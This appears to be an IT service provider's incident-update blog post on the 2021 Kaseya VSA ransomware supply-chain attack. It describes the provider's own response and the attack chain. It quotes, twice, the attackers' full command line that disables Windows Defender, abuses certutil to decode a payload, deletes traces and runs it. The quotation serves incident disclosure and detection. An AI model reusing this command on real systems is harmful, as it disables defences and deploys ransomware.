Maximize your protection, eliminate business risks.
Optimize and modernize with cloud transformation.
Empower your people to work securely from anywhere.
Let us handle IT so you can focus on growing your business.
Get multichannel 24/7/365 expert end-user support.
Stay ahead of attacks with 24/7 protection and monitoring.
Maximize uptime with with industry-leading DRaaS.
Improve efficiency, productivity and outcomes with cloud.
Ensure all mobile devices, everywhere, are secure.
Gain a competitive edge with strategic IT solutions.
This battle-tested checklist enables your team to swiftly initiate a ransomware response.
IT for businesses of all sizes, in any industry.
Empower institution growth with custom IT solutions.
Ensure your firm is always in compliance.
Improve patient care and staff morale.
Deal with pressing legal matters, not IT.
Keep up with the evolving digital landscape.
Focus on your mission by outsourcing IT.
Accelerate PE client deals and secure data.
Leverage your technology as a strategic asset.
Execute initiatives and develop IT strategies.
Get the latest industry insights and trends.
Join us at events in person and online.
Hear from clients and learn more about strategic IT.
See how Dataprise can make IT your greatest asset.
Get informative technical resources from IT experts.
Stay on stop of emerging cybersecurity threats.
Discover the key areas of DR your organization needs to address to ensure downtime is minimized.
Gain a strategic asset by bringing harmony to IT.
Ensure 24/7 support and security with dedicated teams.
Drive business forward by partnering with Dataprise.
Meet our one-of-a-kind leadership team.
Discover the recognition Dataprise has earned.
Help us help businesses with strategic IT.
Embracing different perspectives and backgrounds.
Find a Dataprise location near you.
Dataprise is committed to empowering more women to consider a career in technology.
Posts
By: Dataprise
Table of content
Kaseya continues to work on internal testing of the patches they have developed for VSA. They anticipate an update on the status of the patches as well as a preliminary estimate of when they expect to return to business as usual and advise customers when and how to bring their VSA servers back up safely.
Dataprise has run the Kaseya-provided detection scripts on our production VSA servers with no indications of any compromise discovered. Following the impending update from Kaseya, Dataprise will review the startup procedures and make the best determination for how to resume normal operations in a safe and controlled manner. Customer safety and security are our utmost priority. We are relying on Kaseya’s actions and updates in the short term, while internally strategizing longer term plans for reaction/response and contingency.
Kaseya’s Compromise Detection Tool was provided to Dataprise at 10:36 PM EDT on July 3, 2021. The tool is comprised of two scripts, one for the VSA server and one for endpoints. Our VSA servers were temporarily powered on in an isolated, offline state to facilitate execution of both these scripts. We have also run the endpoint script on several internal machines that were registered with our VSAs. We shut our servers down again immediately after the scripts completed running. Each of these scans completed with no signs of compromise detected. Results were documented and confirmed back to Kaseya Support by 11:26 PM EDT.
On July 2, 2021 Kaseya released an emergency communication via their website about a compromise of their VSA system being used to spread ransomware to client systems. Kaseya proactively shutdown their cloud environment and advised all customers using on-premise VSA servers to shut them down immediately. Kaseya has released information obtained through their internal investigation that indicates the attack vector was likely a SQL Injection against the VSA software that allowed the attacker to take control of the remote management tool, and deploy a REvil ransomware launcher to encrypt the victim systems of all clients.
It is being reported by multiple media outlets that at least six large Managed Service Providers (MSP) were compromised which gave attackers access to encrypt the files belonging to more than 200 companies.
Dataprise immediately shut down all on-premises Kaseya VSA servers and conducted a thorough investigation which determined that our VSA servers were not compromised. We will keep the VSA servers powered down until official patches are released to mitigate the attack vector.
Huntress Labs’ investigation has revealed that the initial attack vector on Kaseya appears to utilize SQL Injection, allowing the attackers full control of the Kaseya VSA instance. In doing so, the attacker gains the ability to deploy a ransomware dropper out to agents checking into the instance. This is supported by evidence that VSA Administrator accounts are disabled moments before ransomware is deployed causing an automated VSA Security Notification indicating that the “KElevated######” (SQL User) account performed the action.
Once administrative access is disabled, the attackers deploy and execute their custom VSA procedure known as “Kaseya VSA Agent Hot-fix” which runs a PowerShell command to disable any Windows Defender telemetry, and then drops the malware’s digital certificate into the root certificate authority to appear as a legitimate signed application to Windows.
Once the certificate is installed, the command then drops the file “Agent.exe” into the path, “C:\kworking”. Once dropped, this file is then executed which drops the files “MsMpEng.exe” and “Mpsvc.dll” into “C:\Windows”. The file “MsMpEng.exe” is a legitimate Windows Defender executable, but the other file “mpsvc.dll” is the ransomware encryptor payload that gets loaded by the file “MsMpEng.exe”.
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe”
“C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5693 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Researchers have identified the ransomware family as REVil, which was released by the Sodinobiki group. This is supported by the ransom note left on encrypted systems.
Dataprise has conducted a thorough investigation of our VSA servers and our networks and has not identified any Indicators of Compromise (IOC). We will leave the VSA servers off until Kaseya has provided patches that can be applied to remove the attack vector.
At this time, Kaseya is recommending that companies power off their VSA servers until the root cause has been identified. Dataprise VSA servers are currently powered off until further notice. Please check all backup solutions and make sure they are actively running and are current. Dataprise will be patching immediately once patches are released and will continue to stay alert for new updates.
Dataprise has also proactively blocked all known file hashes in our endpoint protection capabilities so the REvil ransomware files will not be able to execute and run. We are monitoring our tools and capabilities closely and will alert you to any indications of compromise.
• https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
• https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-200-companies-in-msp-supply-chain-attack/
• https://blackpointcyber.com/blog/kaseyavsa-zeroday/
• Stephen Jones, Senior Director Cybersecurity
• Susan Verdin, Cybersecurity Analyst
• Max Williamson, Cybersecurity Analyst
• Daniel Mervis, Cybersecurity Analyst
• William Hartmann, Manager of Cloud Services
• Mike Carroll, Manager of Network Operations Center
• Ryan Miller, Director Infrastructure Management
INSIGHTS
Subscribe to our blog to learn about the latest IT trends and technology best practices.